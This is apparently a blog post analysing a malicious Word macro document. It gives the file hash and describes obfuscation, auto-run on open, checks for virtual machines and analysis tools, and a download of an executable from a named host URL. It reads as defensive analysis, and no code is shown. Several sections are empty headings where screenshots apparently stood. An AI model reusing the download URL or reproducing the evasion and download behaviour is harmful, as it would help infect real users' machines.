Subpoena Adam Sisitsky_4291016.doc


Date: 04/29/2016

Filename:
Subpoena Adam Sisitsky.doc

SHA-256 Hash Value:
f7d3f54785ffe118504400f1c33e03608f31760fbdee040d1367ed0d73fe302f


Overview

Today I was tasked with looking at a suspicious word document. So I started up my analysis system and got to work. 

First I start off by fingerprinting the document.

File Type:

Meta Info:


Document Overview:


  
Under the Hood:



After profiling the document, I stared to inspect the embedded macros


And of course the code was heavily obfuscated.

This is where things got interesting. 

Since most of these malicious documents are done by a Kit, I copied a public function name into google to see if there were any hits.

https://www.google.com/?gws_rd=ssl#q=yj5zhKqBmrCl9PP%28%29&filter=0

I got hit after hit after hit. Holy crap I said to myself.

This document also uses the Document_Open command which allows the macros to run when the document is opened. 

Script Inspection:

It checks for hardware information of the infected computer system to identify if it’s being analyzed in a virtual environment. 

It also collects information about running processes to identify if there are any analysis tools running in memory, such as Wireshark, snort, and process explorer. 
 
Once the script verifies that the infected system is not an analysis system, it makes an
HTTP GET requests to chienenforme.com/img/doc.exe   

Dynamic Analysis:

In my opinion it's much easier to analyze Macro Code dynamically then it is statically due to a rising problem with tools not able to handle evolving data obfuscation techniques.

Dynamic part 1

I have been playing with this script, which hooks into process and outputs the Execution Flow.

Spooky-Hook.py 

Hook 1.


Hook 2.

Hook 3.

 

  Result.

 

Domain Inspection:

Interesting, these servers have been around for sometime:

 

 

Another reference to this can also be found here:

http://www.broadanalysis.com/2016/04/29/malicious-word-doc-sends-nymaim-info-stealer-and-more/

 

 

 



Comments

Popular Posts